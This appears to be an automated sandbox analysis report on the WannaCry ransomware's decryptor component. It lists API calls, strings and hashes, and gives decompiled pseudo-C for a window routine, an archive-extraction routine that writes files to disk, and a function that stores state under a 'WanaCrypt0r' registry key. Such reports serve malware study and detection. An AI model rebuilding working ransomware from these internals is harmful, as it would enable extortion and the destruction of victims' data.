Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
Part of subcall function 0040B620: SetForegroundWindow.USER32(00000000), ref: 0040B663
Part of subcall function 0040B620: SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
Part of subcall function 0040B620: SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689

#1134.MFC42(00000000,Wana Decrypt0r 2.0,00000001), ref: 00405A8C
#2621.MFC42 ref: 00405A96
#6438.MFC42 ref: 00405A9B

Part of subcall function 004060E0: #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
Part of subcall function 004060E0: #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 0040612F
Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 00406147
Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 004061DF
Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 004061F7
Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406209
Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406219
Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406229

#2514.MFC42 ref: 00405AC1

Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B

Part of subcall function 00403F90: #2414.MFC42(?,?,?,004136D8,000000FF,00403F78), ref: 00403FBB

#800.MFC42 ref: 00405C33
#800.MFC42 ref: 00405C47
#800.MFC42 ref: 00405C5B
#800.MFC42 ref: 00405C6F
#781.MFC42 ref: 00405C83

Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD

Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1

Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD

#609.MFC42 ref: 00405D37
#609.MFC42 ref: 00405D4B
#616.MFC42 ref: 00405D5C
#641.MFC42 ref: 00405D70

Strings

0ZA, xrefs: 00405AC6
DZA, xrefs: 00405B1F
Wana Decrypt0r 2.0, xrefs: 00405A80

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #800Window$#540#567$#2414$#609#795$#1134#2514#2621#324#616#641#6438#654#765#781ActiveBringExitFindFocusForegroundProcessShow
String ID: 0ZA$DZA$Wana Decrypt0r 2.0
API String ID: 3942368781-2594244635
Opcode ID: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
Instruction ID: 9717df00861f10ea142a6202e5f0f29f583150bd1f0a7909c2c79a4805d5fd97
Opcode Fuzzy Hash: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
Instruction Fuzzy Hash: 3871B7345097C18EE735EB25C2557DFBBE4BFA6308F48981E94C916682DFB81108CBA7

Uniqueness

Uniqueness Score: -1.00%

Function 00407A90 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 90
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00407A90(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr _v24;
				char _v32;
				void* _v36;
				char _v44;
				char _v132;
				char* _v136;
				void* _v140;
				void* _v144;
				void* _v148;
				void* _v152;
				char _v160;
				intOrPtr _v164;
				char _v168;
				void* _v180;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t70;
				intOrPtr _t72;
				intOrPtr _t73;

				_push(0xffffffff);
				_push(E00413F17);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t72;
				_t73 = _t72 - 0x80;
				_t70 = __ecx;
				if(_a4 == 0x1388) {
					_t43 = __ecx + 0x2f8;
					if(_t43 != 0) {
						_t43 =  *((intOrPtr*)(_t43 + 0x20));
					}
					if(_a8 == _t43) {
						_t44 = E00404C40( &_v132, 0);
						_v8 = 0;
						L00412B72();
						if(_t44 == 1) {
							_push("***");
							L00412CAA();
							_push("\t");
							_v8 = 1;
							L00412F68();
							_push( &_v44);
							L00412F62();
							_push(0x3b);
							_push(0xa);
							L00412F5C();
							_push(0x3b);
							_push(0xd);
							L00412F5C();
							_push(1);
							_v164 = _t73;
							L00412F56();
							E004082C0(_t70,  &_v168,  &_v160);
							_v44 = 0;
							L00412CC2();
						}
						_v4 = 2;
						_v20 = 0x415c00;
						_v136 =  &_v20;
						_v4 = 5;
						L00412D52();
						_v20 = 0x415bec;
						_v136 =  &_v32;
						_v32 = 0x415c00;
						_v4 = 6;
						L00412D52();
						_v32 = 0x415bec;
						_v4 = 2;
						L00412CC2();
						_v4 = 0xffffffff;
						L00412C86();
					}
				}
				_t42 = _a8;
				_push(_a12);
				_push(_t42);
				_push(_a4);
				L00412BAE(); // executed
				 *[fs:0x0] = _v24;
				return _t42;
			}

0x00407a96
0x00407a98
0x00407a9d
0x00407aa2
0x00407aa9
0x00407ab5
0x00407ab7
0x00407abd
0x00407ac5
0x00407ac7
0x00407ac7
0x00407ad1
0x00407add
0x00407ae6
0x00407af1
0x00407af9
0x00407afb
0x00407b04
0x00407b09
0x00407b12
0x00407b1a
0x00407b27
0x00407b28
0x00407b2d
0x00407b2f
0x00407b35
0x00407b3a
0x00407b3c
0x00407b42
0x00407b47
0x00407b50
0x00407b55
0x00407b5c
0x00407b65
0x00407b6d
0x00407b6d
0x00407b72
0x00407b81
0x00407b89
0x00407b91
0x00407b99
0x00407ba2
0x00407baa
0x00407bae
0x00407bba
0x00407bc2
0x00407bcb
0x00407bd3
0x00407bdb
0x00407be4
0x00407bef
0x00407bef
0x00407ad1
0x00407bfb
0x00407c09
0x00407c0a
0x00407c0b
0x00407c0e
0x00407c1b
0x00407c28

APIs

#2514.MFC42 ref: 00407AF1
#537.MFC42(***), ref: 00407B04
#941.MFC42(00421234,***), ref: 00407B1A
#939.MFC42(?,00421234,***), ref: 00407B28
#6876.MFC42(0000000A,0000003B,?,00421234,***), ref: 00407B35
#6876.MFC42(0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B42
#535.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B55
#800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B6D
#2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B99
#2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BC2
#800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BDB
#641.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BEF
#2385.MFC42(?,?,?), ref: 00407C0E

Strings

[A, xrefs: 00407BCB
***, xrefs: 00407AFB
[A, xrefs: 00407BA2

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2414#6876#800$#2385#2514#535#537#641#939#941
String ID: ***$[A$[A
API String ID: 3659526348-3419262722
Opcode ID: aba664889de062b5968d276a4ab1c1a83eae795fd60498f81a51ba759143eada
Instruction ID: 6b54b999ec918a2e7db5809f8de8f0b59fd624410e6f3b71b4409e3b9ece79cc
Opcode Fuzzy Hash: aba664889de062b5968d276a4ab1c1a83eae795fd60498f81a51ba759143eada
Instruction Fuzzy Hash: D5416A3410C781DAD324DB21C541BEFB7E4BB94704F408A1EB5A9832D1DBB89549CF67

Uniqueness

Uniqueness Score: -1.00%

Function 004063A0 Relevance: 22.6, APIs: 15, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#2302.MFC42(?,0000040F,?), ref: 004063B2
#2302.MFC42(?,000003EC,?,?,0000040F,?), ref: 004063C4
#2302.MFC42(?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063D6
#2302.MFC42(?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063E8
#2302.MFC42(?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063FA
#2302.MFC42(?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?), ref: 0040640C
#2302.MFC42(?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?), ref: 0040641E
#2302.MFC42(?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?), ref: 00406430
#2302.MFC42(?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?), ref: 00406442
#2302.MFC42(?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?), ref: 00406454
#2302.MFC42(?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?), ref: 00406466
#2302.MFC42(?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?), ref: 00406478
#2370.MFC42(?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?), ref: 0040648A
#2370.MFC42(?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?), ref: 0040649C
#2370.MFC42(?,000003EF,?,?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?), ref: 004064AE

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2302$#2370
String ID:
API String ID: 1711274145-0
Opcode ID: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
Instruction ID: 0d28d22553b71fc94a0ee6c66579bb390b9294cd647fac9b7e1ecc0347327b15
Opcode Fuzzy Hash: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
Instruction Fuzzy Hash: 32218E711806017FE22AE365CD82FFFA26CEF85B04F00452EB369951C1BBE8365B5665

Uniqueness

Uniqueness Score: -1.00%

Function 00412360 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 366
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00412360(signed int __ecx, signed int _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v0;
				char _v260;
				struct _FILETIME _v268;
				struct _FILETIME _v276;
				struct _FILETIME _v284;
				void* _v292;
				void* _v296;
				signed int _v304;
				char _v560;
				struct _OVERLAPPED* _v820;
				void* _v824;
				void* _v827;
				void* _v828;
				long _v829;
				void* _v836;
				intOrPtr _t68;
				long _t77;
				void* _t81;
				void* _t82;
				void* _t90;
				void* _t91;
				long _t94;
				signed int _t97;
				long _t99;
				void* _t104;
				void* _t106;
				int _t116;
				long _t121;
				signed int _t132;
				signed int _t138;
				unsigned int _t140;
				signed int _t141;
				void* _t154;
				intOrPtr* _t157;
				intOrPtr _t166;
				void* _t174;
				signed int _t175;
				signed int _t176;
				long _t177;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t180;
				void* _t182;
				long _t183;
				intOrPtr* _t185;
				void* _t187;
				void* _t191;
				void* _t192;

				_t166 = _a16;
				_t132 = __ecx;
				if(_t166 == 3) {
					_t68 =  *((intOrPtr*)(__ecx + 4));
					_t176 = _a4;
					__eflags = _t176 - _t68;
					if(_t176 == _t68) {
						L14:
						_t177 = E00411810( *_t132, _a8, _a12,  &_v829);
						__eflags = _t177;
						if(_t177 <= 0) {
							E00411AC0( *_t132);
							 *(_t132 + 4) = 0xffffffff;
						}
						__eflags = _v829;
						if(_v829 == 0) {
							__eflags = _t177;
							if(_t177 <= 0) {
								asm("sbb eax, eax");
								_t77 = 0x1000 + ( ~(_t177 - 0xffffff96) & 0x04fff000);
								__eflags = _t77;
								return _t77;
							} else {
								return 0x600;
							}
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = _t68 - 0xffffffff;
						if(_t68 != 0xffffffff) {
							E00411AC0( *((intOrPtr*)(__ecx)));
							_t187 = _t187 + 4;
						}
						_t81 =  *_t132;
						 *(_t132 + 4) = 0xffffffff;
						__eflags = _t176 -  *((intOrPtr*)(_t81 + 4));
						if(_t176 <  *((intOrPtr*)(_t81 + 4))) {
							__eflags = _t176 -  *((intOrPtr*)(_t81 + 0x10));
							if(_t176 <  *((intOrPtr*)(_t81 + 0x10))) {
								E00411390(_t81);
								_t187 = _t187 + 4;
							}
							_t82 =  *_t132;
							__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
							while( *((intOrPtr*)(_t82 + 0x10)) < _t176) {
								E004113E0(_t82);
								_t82 =  *_t132;
								_t187 = _t187 + 4;
								__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
							}
							_push( *((intOrPtr*)(_t132 + 0x138)));
							_push( *_t132);
							E00411660();
							_t187 = _t187 + 8;
							 *(_t132 + 4) = _t176;
							goto L14;
						} else {
							return 0x10000;
						}
					}
				} else {
					if(_t166 == 2 || _t166 == 1) {
						_t178 = _t175 | 0xffffffff;
						__eflags =  *(_t132 + 4) - _t178;
						if( *(_t132 + 4) != _t178) {
							E00411AC0( *_t132);
							_t187 = _t187 + 4;
						}
						_t90 =  *_t132;
						 *(_t132 + 4) = _t178;
						_t179 = _a4;
						__eflags = _t179 -  *((intOrPtr*)(_t90 + 4));
						if(_t179 <  *((intOrPtr*)(_t90 + 4))) {
							__eflags = _t179 -  *((intOrPtr*)(_t90 + 0x10));
							if(_t179 <  *((intOrPtr*)(_t90 + 0x10))) {
								E00411390(_t90);
								_t187 = _t187 + 4;
							}
							_t91 =  *_t132;
							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
							while( *((intOrPtr*)(_t91 + 0x10)) < _t179) {
								E004113E0(_t91);
								_t91 =  *_t132;
								_t187 = _t187 + 4;
								__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
							}
							_t138 = _t132;
							E00411CF0(_t138, _t179,  &_v560);
							__eflags = _v304 & 0x00000010;
							if((_v304 & 0x00000010) == 0) {
								__eflags = _t166 - 1;
								if(_t166 != 1) {
									_t157 = _a8;
									_t185 = _t157;
									_t180 = _t157;
									_t94 =  *_t157;
									__eflags = _t94;
									while(_t94 != 0) {
										__eflags = _t94 - 0x2f;
										if(_t94 == 0x2f) {
											L43:
											_t185 = _t180 + 1;
										} else {
											__eflags = _t94 - 0x5c;
											if(_t94 == 0x5c) {
												goto L43;
											}
										}
										_t94 =  *((intOrPtr*)(_t180 + 1));
										_t180 = _t180 + 1;
										__eflags = _t94;
									}
									asm("repne scasb");
									_t140 =  !(_t138 | 0xffffffff);
									_v828 =  &_v820;
									_t182 = _t157 - _t140;
									_t141 = _t140 >> 2;
									_t97 = memcpy(_v828, _t182, _t141 << 2);
									__eflags = _t185 - _t157;
									memcpy(_t182 + _t141 + _t141, _t182, _t97 & 0x00000003);
									_t191 = _t187 + 0x18;
									if(__eflags != 0) {
										 *((char*)(_t191 + _t185 - _t157 + 0x1c)) = 0;
										_t99 = _v820;
										__eflags = _t99 - 0x2f;
										if(_t99 == 0x2f) {
											L55:
											wsprintfA( &_v260, "%s%s",  &_v820, _t185);
											E00412250(0, _t191 + 0x2c);
											_t187 = _t191 + 0x18;
											goto L48;
										} else {
											__eflags = _t99 - 0x5c;
											if(_t99 == 0x5c) {
												goto L55;
											} else {
												__eflags = _t99;
												if(_t99 == 0) {
													goto L47;
												} else {
													__eflags =  *((char*)(_t191 + 0x1d)) - 0x3a;
													if( *((char*)(_t191 + 0x1d)) != 0x3a) {
														goto L47;
													} else {
														goto L55;
													}
												}
											}
										}
										goto L73;
									} else {
										_v820 = 0;
										L47:
										wsprintfA( &_v260, "%s%s%s", _t132 + 0x140,  &_v820, _t185);
										E00412250(_t132 + 0x140, _t191 + 0x30);
										_t187 = _t191 + 0x1c;
									}
									L48:
									_t104 = CreateFileA(_t187 + 0x260, 0x40000000, 0, 0, 2,  *(_t187 + 0x228), 0); // executed
									_t174 = _t104;
								} else {
									_t174 = _a8;
								}
								__eflags = _t174 - 0xffffffff;
								if(_t174 != 0xffffffff) {
									_push( *((intOrPtr*)(_t132 + 0x138)));
									_push( *_t132); // executed
									E00411660(); // executed
									_t106 =  *(_t132 + 0x13c);
									_t192 = _t187 + 8;
									__eflags = _t106;
									if(_t106 == 0) {
										_push(0x4000); // executed
										L00412CEC(); // executed
										_t192 = _t192 + 4;
										 *(_t132 + 0x13c) = _t106;
									}
									_v820 = 0;
									while(1) {
										_t183 = E00411810( *_t132,  *(_t132 + 0x13c), 0x4000, _t192 + 0x13);
										_t192 = _t192 + 0x10;
										__eflags = _t183 - 0xffffff96;
										if(_t183 == 0xffffff96) {
											break;
										}
										__eflags = _t183;
										if(__eflags < 0) {
											L68:
											_v820 = 0x5000000;
										} else {
											if(__eflags <= 0) {
												L63:
												__eflags =  *(_t192 + 0x13);
												if( *(_t192 + 0x13) != 0) {
													SetFileTime(_t174,  &_v276,  &_v284,  &_v268); // executed
												} else {
													__eflags = _t183;
													if(_t183 == 0) {
														goto L68;
													} else {
														continue;
													}
												}
											} else {
												_t116 = WriteFile(_t174,  *(_t132 + 0x13c), _t183, _t192 + 0x18, 0); // executed
												__eflags = _t116;
												if(_t116 == 0) {
													_v820 = 0x400;
												} else {
													goto L63;
												}
											}
										}
										L70:
										__eflags =  *((intOrPtr*)(_t192 + 0x360)) - 1;
										if( *((intOrPtr*)(_t192 + 0x360)) != 1) {
											FindCloseChangeNotification(_t174); // executed
										}
										E00411AC0( *_t132);
										return _v820;
										goto L73;
									}
									_v820 = 0x1000;
									goto L70;
								} else {
									return 0x200;
								}
							} else {
								__eflags = _t166 - 1;
								if(_t166 != 1) {
									_t154 = _a8;
									_t121 =  *_t154;
									__eflags = _t121 - 0x2f;
									if(_t121 == 0x2f) {
										L36:
										E00412250(0, _t154);
										__eflags = 0;
										return 0;
									} else {
										__eflags = _t121 - 0x5c;
										if(_t121 == 0x5c) {
											goto L36;
										} else {
											__eflags = _t121;
											if(_t121 == 0) {
												L37:
												E00412250(_t132 + 0x140, _t154);
												__eflags = 0;
												return 0;
											} else {
												__eflags =  *((char*)(_t154 + 1)) - 0x3a;
												if( *((char*)(_t154 + 1)) != 0x3a) {
													goto L37;
												} else {
													goto L36;
												}
											}
										}
									}
								} else {
									__eflags = 0;
									return 0;
								}
							}
						} else {
							return 0x10000;
						}
					} else {
						return 0x10000;
					}
				}
				L73:
			}

0x0041236a
0x00412371
0x00412376
0x0041239c
0x0041239f
0x004123a6
0x004123a8
0x00412414
0x00412431
0x00412436
0x00412438
0x0041243d
0x00412445
0x00412445
0x00412450
0x00412452
0x00412463
0x00412465
0x00412482
0x0041248b
0x0041248b
0x00412496
0x0041246a
0x00412476
0x00412476
0x00412457
0x00412457
0x00412460
0x00412460
0x004123aa
0x004123aa
0x004123ad
0x004123b2
0x004123b7
0x004123b7
0x004123ba
0x004123bc
0x004123c3
0x004123c6
0x004123da
0x004123dd
0x004123e0
0x004123e5
0x004123e5
0x004123e8
0x004123ea
0x004123ed
0x004123f0
0x004123f5
0x004123f7
0x004123fa
0x004123fa
0x00412407
0x00412408
0x00412409
0x0041240e
0x00412411
0x00000000
0x004123cb
0x004123d7
0x004123d7
0x004123c6
0x00412378
0x0041237b
0x0041249c
0x0041249f
0x004124a1
0x004124a6
0x004124ab
0x004124ab
0x004124ae
0x004124b0
0x004124b3
0x004124ba
0x004124bd
0x004124d1
0x004124d4
0x004124d7
0x004124dc
0x004124dc
0x004124df
0x004124e1
0x004124e4
0x004124e7
0x004124ec
0x004124ee
0x004124f1
0x004124f1
0x004124fd
0x00412501
0x00412506
0x0041250e
0x00412578
0x0041257b
0x00412589
0x00412590
0x00412592
0x00412594
0x00412596
0x00412598
0x0041259a
0x0041259c
0x004125a2
0x004125a2
0x0041259e
0x0041259e
0x004125a0
0x00000000
0x00000000
0x004125a0
0x004125a5
0x004125a8
0x004125a9
0x004125a9
0x004125b8
0x004125ba
0x004125be
0x004125c4
0x004125ca
0x004125cd
0x004125d4
0x004125d6
0x004125d6
0x004125d8
0x0041264d
0x00412652
0x00412656
0x00412658
0x00412671
0x00412684
0x00412691
0x00412696
0x00000000
0x0041265a
0x0041265a
0x0041265c
0x00000000
0x0041265e
0x0041265e
0x00412660
0x00000000
0x00412666
0x00412666
0x0041266b
0x00000000
0x00000000
0x00000000
0x00000000
0x0041266b
0x00412660
0x0041265c
0x00000000
0x004125da
0x004125da
0x004125df
0x004125f9
0x00412605
0x0041260a
0x0041260a
0x0041260d
0x0041262a
0x00412630
0x0041257d
0x0041257d
0x0041257d
0x00412632
0x00412635
0x004126a6
0x004126a7
0x004126a8
0x004126ad
0x004126b3
0x004126b6
0x004126b8
0x004126ba
0x004126bf
0x004126c4
0x004126c7
0x004126c7
0x004126d3
0x004126db
0x004126f4
0x004126f6
0x004126f9
0x004126fc
0x00000000
0x00000000
0x004126fe
0x00412700
0x0041273c
0x0041273c
0x00412702
0x00412702
0x0041271a
0x0041271e
0x00412720
0x0041275f
0x00412722
0x00412722
0x00412724
0x00000000
0x00412726
0x00000000
0x00412726
0x00412724
0x00412704
0x00412714
0x00412716
0x00412718
0x00412732
0x00000000
0x00000000
0x00000000
0x00412718
0x00412702
0x00412765
0x00412765
0x0041276d
0x00412770
0x00412770
0x00412779
0x0041278f
0x00000000
0x0041278f
0x00412728
0x00000000
0x0041263a
0x00412646
0x00412646
0x00412510
0x00412510
0x00412513
0x00412524
0x0041252b
0x0041252d
0x0041252f
0x0041253f
0x00412542
0x0041254a
0x00412556
0x00412531
0x00412531
0x00412533
0x00000000
0x00412535
0x00412535
0x00412537
0x00412559
0x00412561
0x00412569
0x00412575
0x00412539
0x00412539
0x0041253d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041253d
0x00412537
0x00412533
0x00412518
0x00412518
0x00412521
0x00412521
0x00412513
0x004124c2
0x004124ce
0x004124ce
0x0041238d
0x00412399
0x00412399
0x0041237b
0x00000000

Strings

%s%s%s, xrefs: 004125F3
%s%s, xrefs: 0041267E
:, xrefs: 00412666

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID:
String ID: %s%s$%s%s%s$:
API String ID: 0-3034790606
Opcode ID: 8e6b1c0f2cb56c42e6e36ab9d60359e8445b3ce9f897c3f3fd7fecc5fb48561e
Instruction ID: ec0a86814d75b7591ef383b01d603f7b60d36dbaf36e5cde56c141efaaef7cbf
Opcode Fuzzy Hash: 8e6b1c0f2cb56c42e6e36ab9d60359e8445b3ce9f897c3f3fd7fecc5fb48561e
Instruction Fuzzy Hash: 67C138726002045BDB20DF18ED81BEB7398EB85314F04456BFD54CB385D2BDE99A87AA

Uniqueness

Uniqueness Score: -1.00%

Function 00401C70 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 114
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00401C70(signed int _a4) {
				void _v519;
				char _v520;
				void _v700;
				short _v720;
				int _v724;
				void* _v728;
				int _t30;
				void* _t36;
				signed int _t38;
				signed int _t46;
				signed int _t56;
				int _t72;
				void* _t77;

				_t30 = memset( &_v700, memcpy( &_v720, L"Software\\", 5 << 2), 0x2d << 2);
				_v520 = _t30;
				memset( &_v519, _t30, 0x81 << 2);
				asm("stosw");
				asm("stosb");
				_v728 = 0;
				wcscat( &_v720, L"WanaCrypt0r");
				_t72 = 0;
				_v724 = 0;
				do {
					if(_t72 != 0) {
						RegCreateKeyW(0x80000001,  &_v720,  &_v728);
					} else {
						RegCreateKeyW(0x80000002,  &_v720,  &_v728);
					}
					_t36 = _v728;
					if(_t36 == 0) {
						goto L10;
					} else {
						_t56 = _a4;
						if(_t56 == 0) {
							_v724 = 0x207;
							_t38 = RegQueryValueExA(_t36, "wd", 0, 0,  &_v520,  &_v724); // executed
							asm("sbb esi, esi");
							_t77 =  ~_t38 + 1;
							if(_t77 != 0) {
								SetCurrentDirectoryA( &_v520);
							}
						} else {
							GetCurrentDirectoryA(0x207,  &_v520);
							asm("repne scasb");
							_t46 = RegSetValueExA(_v728, "wd", 0, 1,  &_v520,  !(_t56 | 0xffffffff));
							_t72 = _v724;
							asm("sbb esi, esi");
							_t77 =  ~_t46 + 1;
						}
						RegCloseKey(_v728); // executed
						if(_t77 != 0) {
							return 1;
						} else {
							goto L10;
						}
					}
					L13:
					L10:
					_t72 = _t72 + 1;
					_v724 = _t72;
				} while (_t72 < 2);
				return 0;
				goto L13;
			}

0x00401c95
0x00401ca3
0x00401caf
0x00401cb1
0x00401cb3
0x00401cb8
0x00401cc1
0x00401cd6
0x00401cd8
0x00401cdc
0x00401cde
0x00401d00
0x00401ce0
0x00401d00
0x00401d00
0x00401d06
0x00401d0c
0x00000000
0x00401d12
0x00401d12
0x00401d1b
0x00401d79
0x00401d81
0x00401d8b
0x00401d8d
0x00401d8e
0x00401d98
0x00401d98
0x00401d1d
0x00401d2a
0x00401d38
0x00401d53
0x00401d55
0x00401d5d
0x00401d5f
0x00401d5f
0x00401da3
0x00401dab
0x00401dd7
0x00000000
0x00000000
0x00000000
0x00401dab
0x00000000
0x00401dad
0x00401dad
0x00401db1
0x00401db1
0x00401dc7
0x00000000

APIs

wcscat.MSVCRT ref: 00401CC1
RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
RegQueryValueExA.KERNELBASE ref: 00401D81
SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
RegCloseKey.KERNELBASE(00000000), ref: 00401DA3

Strings

WanaCrypt0r, xrefs: 00401CAA
